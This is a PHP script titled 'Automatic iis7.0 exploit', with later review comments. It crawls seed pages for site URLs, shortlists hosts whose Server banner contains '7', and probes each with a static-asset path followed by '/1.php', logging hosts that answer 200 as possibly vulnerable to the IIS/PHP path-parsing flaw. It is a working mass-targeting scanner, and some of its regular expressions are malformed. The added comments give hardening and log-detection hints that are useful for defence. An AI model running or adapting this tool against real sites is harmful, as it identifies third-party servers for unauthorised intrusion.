exploit.php:
<?php
// Four-stage pipeline, driven entirely by text files in the working directory:
//   1. f()      : list_url.txt (seed pages) -> t00ls.txt (URLs found on those pages)
//   2. unique() : t00ls.txt -> list_url.txt (de-duplicated, overwrites the seeds)
//   3. a()      : list_url.txt -> url.txt (hosts whose Server line contains "7")
//   4. urltxt() : url.txt -> ok.txt (hosts answering 200 to <static file>/1.php)
// Nothing visible here uploads or executes a payload; the script only issues GET
// requests and records status codes.
// NOTE(review): the page does not name the underlying flaw. The probe shape
// (static asset path followed by "/1.php") matches the PHP-over-FastCGI PATH_INFO
// handling problem, for which the usual hardening is `cgi.fix_pathinfo=0` in
// php.ini and limiting the IIS handler mapping to requests that map to an
// existing file. Confirm against the affected stack.
//
// Banner. The last line says: "closes automatically when finished; open ok.txt
// to view the results".
print("
[-] Exploit Title: Automatic iis7.0 exploit [-]
[+] Date: 4/9/2011 [+]
[-] Team: DMTeam [-]
[+] Author: Dark'moon [+]
[-] QQ:40497992 [-]
[-] Email: 40497992@qq.com [-]
[+] Software Link: http://www.moonhack.com/ [+]
[+]Start-----------------------------[+]
[-]Explain:完成后自动关闭 打开ok.txt查看结果[-]\r\n");
// Report fatal errors only, so failed fetches and missing files produce no
// warnings on the console.
error_reporting(E_ERROR);
// Remove PHP's execution time limit; the run lasts as long as the URL lists do.
set_time_limit(0);
// Stage 1. f() is defined further down; PHP hoists top-level function
// declarations, so the call works before the definition.
f();
// Function that collects URLs
/**
 * Fetch one page and record every "scheme://ww(w)." style URL found in its body.
 *
 * Each distinct match is printed and handed to write(), which appends it to
 * t00ls.txt. The recursive call is commented out in the original, so the crawl
 * is one level deep: only the seed pages themselves are read.
 *
 * @param string $ip URL of the page to fetch (despite the name, not an IP address)
 */
function pregUrl($ip){
    // Fetch errors are suppressed; a failed fetch simply yields no matches.
    $body = @file_get_contents($ip);
    $pattern = '/[a-zA-z]+:\/\/www?\.[0-9a-zA-z_]+[\.a-z]+/';
    if (!preg_match_all($pattern, $body, $groups)) {
        return;
    }
    // The pattern has no capture groups, so $groups holds only the full-match list.
    foreach ($groups as $hits) {
        foreach (array_values(array_unique($hits)) as $hit) {
            $hit = trim($hit);
            print("获取网站{$hit}\r\n");
            write($hit);
        }
    }
}
// Write function
/**
 * Append one line (CRLF-terminated) to t00ls.txt, the stage-1 output file.
 *
 * All three file calls are error-suppressed, so a write failure is silent.
 *
 * @param string $data text to append
 */
function write($data){
    $fp = @fopen('t00ls.txt', "a");
    $line = $data."\r\n";
    @fwrite($fp, $line);
    @fclose($fp);
}
// Start function
/**
 * Stage 1 driver: read the seed URLs from list_url.txt, one per line, and run
 * pregUrl() on each after trimming whitespace and line endings.
 */
function f(){
    foreach (file('list_url.txt') as $seed) {
        pregUrl(trim($seed));
    }
}
// Remove duplicates
// Stage 2: announce that URL collection has finished (the printed message), then
// replace list_url.txt with the de-duplicated contents of t00ls.txt.
print("获取网站完毕\r\n");
unique();
/**
 * Stage 2: copy the distinct lines of t00ls.txt into list_url.txt.
 *
 * list_url.txt is opened in "w" mode, so the original seed list is overwritten.
 * Lines keep their trailing line endings, which is why nothing is appended when
 * they are written back. The handle is never closed explicitly.
 */
function unique(){
    $lines = file('t00ls.txt');
    $out = fopen('list_url.txt', 'w');
    foreach (array_unique($lines) as $line) {
        print("正在写入网站 ".$line);
        fwrite($out, $line);
    }
}
// Stage 3: check the Server response header of every URL now in list_url.txt.
a();
// Get the server type
/**
 * Read the Server response header of $url and shortlist the host in url.txt
 * (via w()) when the printed report line contains the character "7".
 *
 * The match runs against the whole report line, which includes the URL as well
 * as the banner, so it is a loose text filter rather than a version check.
 * Responses with several Server headers (an array) are skipped.
 *
 * For defenders: selection here depends only on the advertised banner. Trimming
 * the banner reduces exposure to this kind of automated filtering, but does not
 * change how the server itself behaves.
 *
 * @param string $url URL whose headers are requested
 */
function Server($url){
    $headers = get_headers($url, 1);
    if (!array_key_exists('Server', $headers)) {
        return;
    }
    $banner = $headers['Server'];
    if (is_array($banner)) {
        return;
    }
    $report = "网址: ".$url." 服务器类型: ".$banner."\r\n";
    echo $report;
    if (preg_match("/7/", $report)) {
        // Hand the URL to the url.txt writer.
        w($url);
    }
}
// Read-in function
/**
 * Stage 3 driver: run Server() on every trimmed line of list_url.txt.
 */
function a(){
    foreach (file('list_url.txt') as $line) {
        Server(trim($line));
    }
}
// Write function
/**
 * Append one URL (CRLF-terminated) to url.txt, the stage-3 shortlist.
 * The handle is left for PHP to release when the function returns.
 *
 * @param string $url URL to record
 */
function w($url){
    $fp = fopen('url.txt', 'a');
    $line = $url."\r\n";
    fwrite($fp, $line);
}
// Stage 4: probe every shortlisted host in url.txt and log the 200 responses to ok.txt.
urltxt();
// Read url.txt
/**
 * Stage 4 driver: run img() on every trimmed line of url.txt.
 */
function urltxt(){
    foreach (file('url.txt') as $line) {
        img(trim($line));
    }
}
// Get the page's HTTP response code
/**
 * Request $url and classify the host by HTTP status alone.
 *
 * A 200 response is printed as "may be vulnerable" and the URL is appended to
 * ok.txt through urlwrite(); any other status is printed as "not vulnerable".
 * The response body is fetched but discarded, so the result is only an
 * indication: a server that answers 200 to unknown paths is recorded as well.
 *
 * @param string $url fully built probe URL
 */
function curl($url){
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL            => $url,
        CURLOPT_HEADER         => true,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT        => 20,
    ]);
    curl_exec($ch);
    $status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    if ($status == 200) {
        print("$url 可能存在漏洞\r\n");
        urlwrite($url);
        return;
    }
    print("$url 不存在漏洞\r\n");
}
// Get an image from the site
/**
 * Build the probe URL for one host and pass it to curl().
 *
 * The page at $url is fetched and the first path ending in
 * gif/jpg/bmp/png/swf/txt is taken from its HTML; the probe is
 * "<url>/<that path>/1.php". Hosts whose page references no such file are
 * skipped.
 *
 * For defenders: this leaves a recognisable access-log entry, a request whose
 * path is an existing static asset followed by "/1.php". A 200 served for such
 * a path is worth investigating.
 *
 * @param string $url base URL of the shortlisted host
 */
function img($url){
    $html = file_get_contents($url);
    $pattern = '/[0-a-ZA-Z_\/]*\.(gif|jpg|bmp|png|swf|txt)/i';
    if (!preg_match($pattern, $html, $hit)) {
        return;
    }
    curl($url.'/'.$hit[0].'/1.php');
}
/**
 * Append one probe URL (CRLF-terminated) to ok.txt, the final result file
 * named in the banner. The handle is left for PHP to release on return.
 *
 * @param string $url probe URL that returned HTTP 200
 */
function urlwrite($url){
    $fp = fopen('ok.txt', "a");
    $line = $url."\r\n";
    fwrite($fp, $line);
}
?> |